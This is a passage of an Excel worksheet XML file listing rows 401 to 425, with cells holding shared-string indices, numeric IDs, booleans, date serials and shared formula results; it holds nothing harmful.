      <c r="O401" s="1" t="s">
        <v>1982</v>
      </c>
      <c r="P401" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q401" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R401" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S401" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="402">
      <c r="A402" s="1">
        <v>5761.0</v>
      </c>
      <c r="B402" s="2" t="s">
        <v>1983</v>
      </c>
      <c r="C402" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D402" s="2" t="s">
        <v>1984</v>
      </c>
      <c r="E402" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F402" s="1" t="s">
        <v>859</v>
      </c>
      <c r="G402" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H402" s="1" t="s">
        <v>1985</v>
      </c>
      <c r="I402" s="1" t="s">
        <v>742</v>
      </c>
      <c r="J402" s="1" t="s">
        <v>1986</v>
      </c>
      <c r="K402" s="2" t="s">
        <v>1987</v>
      </c>
      <c r="L402" s="1">
        <v>3.0</v>
      </c>
      <c r="M402" s="1">
        <v>3.0</v>
      </c>
      <c r="N402" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O402" s="1" t="s">
        <v>834</v>
      </c>
      <c r="P402" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q402" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R402" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S402" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="403">
      <c r="A403" s="1">
        <v>5795.0</v>
      </c>
      <c r="B403" s="2" t="s">
        <v>1988</v>
      </c>
      <c r="C403" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D403" s="2" t="s">
        <v>1989</v>
      </c>
      <c r="E403" s="2" t="s">
        <v>1097</v>
      </c>
      <c r="F403" s="1" t="s">
        <v>1990</v>
      </c>
      <c r="G403" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H403" s="1" t="s">
        <v>1991</v>
      </c>
      <c r="I403" s="1" t="s">
        <v>220</v>
      </c>
      <c r="J403" s="1" t="s">
        <v>1992</v>
      </c>
      <c r="K403" s="2" t="s">
        <v>1993</v>
      </c>
      <c r="L403" s="1">
        <v>11.0</v>
      </c>
      <c r="M403" s="1">
        <v>14.0</v>
      </c>
      <c r="N403" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O403" s="1" t="s">
        <v>1994</v>
      </c>
      <c r="P403" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q403" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R403" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S403" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="404">
      <c r="A404" s="1">
        <v>5806.0</v>
      </c>
      <c r="B404" s="2" t="s">
        <v>1995</v>
      </c>
      <c r="C404" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D404" s="2" t="s">
        <v>1989</v>
      </c>
      <c r="E404" s="2" t="s">
        <v>1097</v>
      </c>
      <c r="F404" s="1" t="s">
        <v>218</v>
      </c>
      <c r="G404" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H404" s="1" t="s">
        <v>1996</v>
      </c>
      <c r="I404" s="1" t="s">
        <v>220</v>
      </c>
      <c r="J404" s="1" t="s">
        <v>1992</v>
      </c>
      <c r="K404" s="2" t="s">
        <v>1993</v>
      </c>
      <c r="L404" s="1">
        <v>11.0</v>
      </c>
      <c r="M404" s="1">
        <v>14.0</v>
      </c>
      <c r="N404" s="1" t="s">
        <v>1997</v>
      </c>
      <c r="O404" s="1" t="s">
        <v>1994</v>
      </c>
      <c r="P404" s="1" t="s">
        <v>1356</v>
      </c>
      <c r="Q404" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R404" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S404" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="405">
      <c r="A405" s="1">
        <v>5807.0</v>
      </c>
      <c r="B405" s="2" t="s">
        <v>1998</v>
      </c>
      <c r="C405" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D405" s="2" t="s">
        <v>1989</v>
      </c>
      <c r="E405" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F405" s="1" t="s">
        <v>218</v>
      </c>
      <c r="G405" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H405" s="1" t="s">
        <v>1999</v>
      </c>
      <c r="I405" s="1" t="s">
        <v>220</v>
      </c>
      <c r="J405" s="1" t="s">
        <v>1992</v>
      </c>
      <c r="K405" s="2" t="s">
        <v>1993</v>
      </c>
      <c r="L405" s="1">
        <v>11.0</v>
      </c>
      <c r="M405" s="1">
        <v>14.0</v>
      </c>
      <c r="N405" s="1" t="s">
        <v>514</v>
      </c>
      <c r="O405" s="1" t="s">
        <v>1994</v>
      </c>
      <c r="P405" s="1" t="s">
        <v>1338</v>
      </c>
      <c r="Q405" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R405" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S405" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="406">
      <c r="A406" s="1">
        <v>5819.0</v>
      </c>
      <c r="B406" s="2" t="s">
        <v>2000</v>
      </c>
      <c r="C406" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D406" s="2" t="s">
        <v>2001</v>
      </c>
      <c r="E406" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F406" s="1" t="s">
        <v>2002</v>
      </c>
      <c r="G406" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H406" s="1" t="s">
        <v>2003</v>
      </c>
      <c r="I406" s="1" t="s">
        <v>54</v>
      </c>
      <c r="J406" s="1" t="s">
        <v>2004</v>
      </c>
      <c r="K406" s="2" t="s">
        <v>2005</v>
      </c>
      <c r="L406" s="1">
        <v>4.0</v>
      </c>
      <c r="M406" s="1">
        <v>4.0</v>
      </c>
      <c r="N406" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O406" s="1" t="s">
        <v>2006</v>
      </c>
      <c r="P406" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q406" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R406" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S406" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="407">
      <c r="A407" s="1">
        <v>5820.0</v>
      </c>
      <c r="B407" s="2" t="s">
        <v>2007</v>
      </c>
      <c r="C407" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D407" s="2" t="s">
        <v>2008</v>
      </c>
      <c r="E407" s="2" t="s">
        <v>1495</v>
      </c>
      <c r="F407" s="1" t="s">
        <v>2009</v>
      </c>
      <c r="G407" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H407" s="1" t="s">
        <v>2010</v>
      </c>
      <c r="I407" s="1" t="s">
        <v>54</v>
      </c>
      <c r="J407" s="1" t="s">
        <v>2004</v>
      </c>
      <c r="K407" s="2" t="s">
        <v>2005</v>
      </c>
      <c r="L407" s="1">
        <v>4.0</v>
      </c>
      <c r="M407" s="1">
        <v>4.0</v>
      </c>
      <c r="N407" s="1" t="s">
        <v>104</v>
      </c>
      <c r="O407" s="1" t="s">
        <v>2006</v>
      </c>
      <c r="P407" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q407" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R407" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S407" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="408">
      <c r="A408" s="1">
        <v>5901.0</v>
      </c>
      <c r="B408" s="2" t="s">
        <v>2011</v>
      </c>
      <c r="C408" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D408" s="2" t="s">
        <v>2012</v>
      </c>
      <c r="E408" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F408" s="1" t="s">
        <v>23</v>
      </c>
      <c r="G408" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H408" s="1" t="s">
        <v>2013</v>
      </c>
      <c r="I408" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J408" s="1" t="s">
        <v>2014</v>
      </c>
      <c r="K408" s="2" t="s">
        <v>2015</v>
      </c>
      <c r="L408" s="1">
        <v>2.0</v>
      </c>
      <c r="M408" s="1">
        <v>3.0</v>
      </c>
      <c r="N408" s="1" t="s">
        <v>2016</v>
      </c>
      <c r="O408" s="1" t="s">
        <v>2017</v>
      </c>
      <c r="P408" s="1" t="s">
        <v>510</v>
      </c>
      <c r="Q408" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R408" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S408" s="1">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
    </row>
    <row r="409">
      <c r="A409" s="1">
        <v>5902.0</v>
      </c>
      <c r="B409" s="2" t="s">
        <v>2018</v>
      </c>
      <c r="C409" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D409" s="2" t="s">
        <v>2019</v>
      </c>
      <c r="E409" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F409" s="1" t="s">
        <v>182</v>
      </c>
      <c r="G409" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H409" s="1" t="s">
        <v>2020</v>
      </c>
      <c r="I409" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J409" s="1" t="s">
        <v>2014</v>
      </c>
      <c r="K409" s="2" t="s">
        <v>2015</v>
      </c>
      <c r="L409" s="1">
        <v>2.0</v>
      </c>
      <c r="M409" s="1">
        <v>3.0</v>
      </c>
      <c r="N409" s="1" t="s">
        <v>2021</v>
      </c>
      <c r="O409" s="1" t="s">
        <v>2017</v>
      </c>
      <c r="P409" s="1" t="s">
        <v>2022</v>
      </c>
      <c r="Q409" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R409" s="2">
        <f t="shared" si="2"/>
        <v>6</v>
      </c>
      <c r="S409" s="1">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
    </row>
    <row r="410">
      <c r="A410" s="1">
        <v>5933.0</v>
      </c>
      <c r="B410" s="2" t="s">
        <v>2023</v>
      </c>
      <c r="C410" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D410" s="2" t="s">
        <v>2024</v>
      </c>
      <c r="E410" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F410" s="1" t="s">
        <v>2025</v>
      </c>
      <c r="G410" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H410" s="4">
        <v>44356.16875</v>
      </c>
      <c r="I410" s="1" t="s">
        <v>1582</v>
      </c>
      <c r="J410" s="1" t="s">
        <v>2026</v>
      </c>
      <c r="K410" s="2" t="s">
        <v>2027</v>
      </c>
      <c r="L410" s="1">
        <v>11.0</v>
      </c>
      <c r="M410" s="1">
        <v>12.0</v>
      </c>
      <c r="N410" s="1" t="s">
        <v>2028</v>
      </c>
      <c r="O410" s="1" t="s">
        <v>2029</v>
      </c>
      <c r="P410" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q410" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R410" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S410" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="411">
      <c r="A411" s="1">
        <v>5942.0</v>
      </c>
      <c r="B411" s="2" t="s">
        <v>2030</v>
      </c>
      <c r="C411" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D411" s="2" t="s">
        <v>2031</v>
      </c>
      <c r="E411" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F411" s="1" t="s">
        <v>2032</v>
      </c>
      <c r="G411" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H411" s="1" t="s">
        <v>2033</v>
      </c>
      <c r="I411" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J411" s="1" t="s">
        <v>2034</v>
      </c>
      <c r="K411" s="2" t="s">
        <v>2035</v>
      </c>
      <c r="L411" s="1">
        <v>6.0</v>
      </c>
      <c r="M411" s="1">
        <v>6.0</v>
      </c>
      <c r="N411" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O411" s="1" t="s">
        <v>2036</v>
      </c>
      <c r="P411" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q411" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R411" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S411" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="412">
      <c r="A412" s="1">
        <v>5943.0</v>
      </c>
      <c r="B412" s="2" t="s">
        <v>2037</v>
      </c>
      <c r="C412" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D412" s="2" t="s">
        <v>2038</v>
      </c>
      <c r="E412" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F412" s="1" t="s">
        <v>2039</v>
      </c>
      <c r="G412" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H412" s="1" t="s">
        <v>2040</v>
      </c>
      <c r="I412" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J412" s="1" t="s">
        <v>2034</v>
      </c>
      <c r="K412" s="2" t="s">
        <v>2035</v>
      </c>
      <c r="L412" s="1">
        <v>6.0</v>
      </c>
      <c r="M412" s="1">
        <v>6.0</v>
      </c>
      <c r="N412" s="1" t="s">
        <v>2041</v>
      </c>
      <c r="O412" s="1" t="s">
        <v>2036</v>
      </c>
      <c r="P412" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q412" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R412" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S412" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="413">
      <c r="A413" s="1">
        <v>5945.0</v>
      </c>
      <c r="B413" s="2" t="s">
        <v>2042</v>
      </c>
      <c r="C413" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D413" s="2" t="s">
        <v>2038</v>
      </c>
      <c r="E413" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F413" s="1" t="s">
        <v>2043</v>
      </c>
      <c r="G413" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H413" s="1" t="s">
        <v>2044</v>
      </c>
      <c r="I413" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J413" s="1" t="s">
        <v>2034</v>
      </c>
      <c r="K413" s="2" t="s">
        <v>2035</v>
      </c>
      <c r="L413" s="1">
        <v>6.0</v>
      </c>
      <c r="M413" s="1">
        <v>6.0</v>
      </c>
      <c r="N413" s="1" t="s">
        <v>2045</v>
      </c>
      <c r="O413" s="1" t="s">
        <v>2036</v>
      </c>
      <c r="P413" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q413" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R413" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S413" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="414">
      <c r="A414" s="1">
        <v>5958.0</v>
      </c>
      <c r="B414" s="2" t="s">
        <v>2046</v>
      </c>
      <c r="C414" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D414" s="2" t="s">
        <v>2047</v>
      </c>
      <c r="E414" s="2" t="s">
        <v>135</v>
      </c>
      <c r="F414" s="1" t="s">
        <v>2048</v>
      </c>
      <c r="G414" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H414" s="4">
        <v>44506.350694444445</v>
      </c>
      <c r="I414" s="1" t="s">
        <v>545</v>
      </c>
      <c r="J414" s="1" t="s">
        <v>2049</v>
      </c>
      <c r="K414" s="2" t="s">
        <v>2050</v>
      </c>
      <c r="L414" s="1">
        <v>5.0</v>
      </c>
      <c r="M414" s="1">
        <v>7.0</v>
      </c>
      <c r="N414" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O414" s="1" t="s">
        <v>2051</v>
      </c>
      <c r="P414" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q414" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R414" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S414" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="415">
      <c r="A415" s="1">
        <v>5959.0</v>
      </c>
      <c r="B415" s="2" t="s">
        <v>2052</v>
      </c>
      <c r="C415" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D415" s="2" t="s">
        <v>2047</v>
      </c>
      <c r="E415" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F415" s="1" t="s">
        <v>709</v>
      </c>
      <c r="G415" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H415" s="4">
        <v>44506.39444444444</v>
      </c>
      <c r="I415" s="1" t="s">
        <v>545</v>
      </c>
      <c r="J415" s="1" t="s">
        <v>2049</v>
      </c>
      <c r="K415" s="2" t="s">
        <v>2050</v>
      </c>
      <c r="L415" s="1">
        <v>5.0</v>
      </c>
      <c r="M415" s="1">
        <v>7.0</v>
      </c>
      <c r="N415" s="1" t="s">
        <v>2053</v>
      </c>
      <c r="O415" s="1" t="s">
        <v>2051</v>
      </c>
      <c r="P415" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q415" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R415" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S415" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="416">
      <c r="A416" s="1">
        <v>5960.0</v>
      </c>
      <c r="B416" s="2" t="s">
        <v>2054</v>
      </c>
      <c r="C416" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D416" s="2" t="s">
        <v>2047</v>
      </c>
      <c r="E416" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F416" s="1" t="s">
        <v>2055</v>
      </c>
      <c r="G416" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H416" s="4">
        <v>44506.615277777775</v>
      </c>
      <c r="I416" s="1" t="s">
        <v>545</v>
      </c>
      <c r="J416" s="1" t="s">
        <v>2049</v>
      </c>
      <c r="K416" s="2" t="s">
        <v>2050</v>
      </c>
      <c r="L416" s="1">
        <v>5.0</v>
      </c>
      <c r="M416" s="1">
        <v>7.0</v>
      </c>
      <c r="N416" s="1" t="s">
        <v>2056</v>
      </c>
      <c r="O416" s="1" t="s">
        <v>2051</v>
      </c>
      <c r="P416" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q416" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R416" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S416" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="417">
      <c r="A417" s="1">
        <v>5962.0</v>
      </c>
      <c r="B417" s="2" t="s">
        <v>2057</v>
      </c>
      <c r="C417" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D417" s="2" t="s">
        <v>2047</v>
      </c>
      <c r="E417" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F417" s="1" t="s">
        <v>2048</v>
      </c>
      <c r="G417" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H417" s="4">
        <v>44506.842361111114</v>
      </c>
      <c r="I417" s="1" t="s">
        <v>545</v>
      </c>
      <c r="J417" s="1" t="s">
        <v>2049</v>
      </c>
      <c r="K417" s="2" t="s">
        <v>2050</v>
      </c>
      <c r="L417" s="1">
        <v>5.0</v>
      </c>
      <c r="M417" s="1">
        <v>7.0</v>
      </c>
      <c r="N417" s="1" t="s">
        <v>553</v>
      </c>
      <c r="O417" s="1" t="s">
        <v>2051</v>
      </c>
      <c r="P417" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q417" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R417" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S417" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="418">
      <c r="A418" s="1">
        <v>5977.0</v>
      </c>
      <c r="B418" s="2" t="s">
        <v>2058</v>
      </c>
      <c r="C418" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D418" s="2" t="s">
        <v>2059</v>
      </c>
      <c r="E418" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F418" s="1" t="s">
        <v>2060</v>
      </c>
      <c r="G418" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H418" s="1" t="s">
        <v>2061</v>
      </c>
      <c r="I418" s="1" t="s">
        <v>2062</v>
      </c>
      <c r="J418" s="1" t="s">
        <v>2063</v>
      </c>
      <c r="K418" s="2" t="s">
        <v>2064</v>
      </c>
      <c r="L418" s="1">
        <v>10.0</v>
      </c>
      <c r="M418" s="1">
        <v>16.0</v>
      </c>
      <c r="N418" s="1" t="s">
        <v>2065</v>
      </c>
      <c r="O418" s="1" t="s">
        <v>2066</v>
      </c>
      <c r="P418" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q418" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R418" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S418" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="419">
      <c r="A419" s="1">
        <v>5993.0</v>
      </c>
      <c r="B419" s="2" t="s">
        <v>2067</v>
      </c>
      <c r="C419" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D419" s="2" t="s">
        <v>2068</v>
      </c>
      <c r="E419" s="2" t="s">
        <v>1495</v>
      </c>
      <c r="F419" s="1" t="s">
        <v>218</v>
      </c>
      <c r="G419" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H419" s="4">
        <v>44264.38055555556</v>
      </c>
      <c r="I419" s="1" t="s">
        <v>54</v>
      </c>
      <c r="J419" s="1" t="s">
        <v>2069</v>
      </c>
      <c r="K419" s="2" t="s">
        <v>2070</v>
      </c>
      <c r="L419" s="1">
        <v>6.0</v>
      </c>
      <c r="M419" s="1">
        <v>14.0</v>
      </c>
      <c r="N419" s="1" t="s">
        <v>2071</v>
      </c>
      <c r="O419" s="1" t="s">
        <v>2072</v>
      </c>
      <c r="P419" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q419" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R419" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S419" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="420">
      <c r="A420" s="1">
        <v>5995.0</v>
      </c>
      <c r="B420" s="2" t="s">
        <v>2073</v>
      </c>
      <c r="C420" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D420" s="2" t="s">
        <v>2074</v>
      </c>
      <c r="E420" s="2" t="s">
        <v>832</v>
      </c>
      <c r="F420" s="1" t="s">
        <v>2075</v>
      </c>
      <c r="G420" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H420" s="4">
        <v>44751.70416666667</v>
      </c>
      <c r="I420" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J420" s="1" t="s">
        <v>2076</v>
      </c>
      <c r="K420" s="2" t="s">
        <v>2077</v>
      </c>
      <c r="L420" s="1">
        <v>6.0</v>
      </c>
      <c r="M420" s="1">
        <v>7.0</v>
      </c>
      <c r="N420" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O420" s="1" t="s">
        <v>2078</v>
      </c>
      <c r="P420" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q420" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R420" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S420" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="421">
      <c r="A421" s="1">
        <v>5996.0</v>
      </c>
      <c r="B421" s="2" t="s">
        <v>2079</v>
      </c>
      <c r="C421" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D421" s="2" t="s">
        <v>2074</v>
      </c>
      <c r="E421" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F421" s="1" t="s">
        <v>2080</v>
      </c>
      <c r="G421" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H421" s="4">
        <v>44751.71319444444</v>
      </c>
      <c r="I421" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J421" s="1" t="s">
        <v>2076</v>
      </c>
      <c r="K421" s="2" t="s">
        <v>2077</v>
      </c>
      <c r="L421" s="1">
        <v>6.0</v>
      </c>
      <c r="M421" s="1">
        <v>7.0</v>
      </c>
      <c r="N421" s="1" t="s">
        <v>1430</v>
      </c>
      <c r="O421" s="1" t="s">
        <v>2078</v>
      </c>
      <c r="P421" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q421" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R421" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S421" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="422">
      <c r="A422" s="1">
        <v>5997.0</v>
      </c>
      <c r="B422" s="2" t="s">
        <v>2081</v>
      </c>
      <c r="C422" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D422" s="2" t="s">
        <v>2074</v>
      </c>
      <c r="E422" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F422" s="1" t="s">
        <v>2082</v>
      </c>
      <c r="G422" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H422" s="4">
        <v>44751.76527777778</v>
      </c>
      <c r="I422" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J422" s="1" t="s">
        <v>2076</v>
      </c>
      <c r="K422" s="2" t="s">
        <v>2077</v>
      </c>
      <c r="L422" s="1">
        <v>6.0</v>
      </c>
      <c r="M422" s="1">
        <v>7.0</v>
      </c>
      <c r="N422" s="1" t="s">
        <v>2083</v>
      </c>
      <c r="O422" s="1" t="s">
        <v>2078</v>
      </c>
      <c r="P422" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q422" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R422" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S422" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="423">
      <c r="A423" s="1">
        <v>5998.0</v>
      </c>
      <c r="B423" s="2" t="s">
        <v>2084</v>
      </c>
      <c r="C423" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D423" s="2" t="s">
        <v>2074</v>
      </c>
      <c r="E423" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F423" s="1" t="s">
        <v>258</v>
      </c>
      <c r="G423" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H423" s="4">
        <v>44751.78680555556</v>
      </c>
      <c r="I423" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J423" s="1" t="s">
        <v>2076</v>
      </c>
      <c r="K423" s="2" t="s">
        <v>2077</v>
      </c>
      <c r="L423" s="1">
        <v>6.0</v>
      </c>
      <c r="M423" s="1">
        <v>7.0</v>
      </c>
      <c r="N423" s="1" t="s">
        <v>1876</v>
      </c>
      <c r="O423" s="1" t="s">
        <v>2078</v>
      </c>
      <c r="P423" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q423" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R423" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S423" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="424">
      <c r="A424" s="1">
        <v>5999.0</v>
      </c>
      <c r="B424" s="2" t="s">
        <v>2085</v>
      </c>
      <c r="C424" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D424" s="2" t="s">
        <v>2074</v>
      </c>
      <c r="E424" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F424" s="1" t="s">
        <v>993</v>
      </c>
      <c r="G424" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H424" s="4">
        <v>44751.802083333336</v>
      </c>
      <c r="I424" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J424" s="1" t="s">
        <v>2076</v>
      </c>
      <c r="K424" s="2" t="s">
        <v>2077</v>
      </c>
      <c r="L424" s="1">
        <v>6.0</v>
      </c>
      <c r="M424" s="1">
        <v>7.0</v>
      </c>
      <c r="N424" s="1" t="s">
        <v>1553</v>
      </c>
      <c r="O424" s="1" t="s">
        <v>2078</v>
      </c>
      <c r="P424" s="1" t="s">
        <v>1416</v>
      </c>
      <c r="Q424" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R424" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S424" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="425">
      <c r="A425" s="1">
        <v>6000.0</v>
      </c>
      <c r="B425" s="2" t="s">
        <v>2086</v>
      </c>
      <c r="C425" s="1" t="s">
        <v>20</v>
      </c>
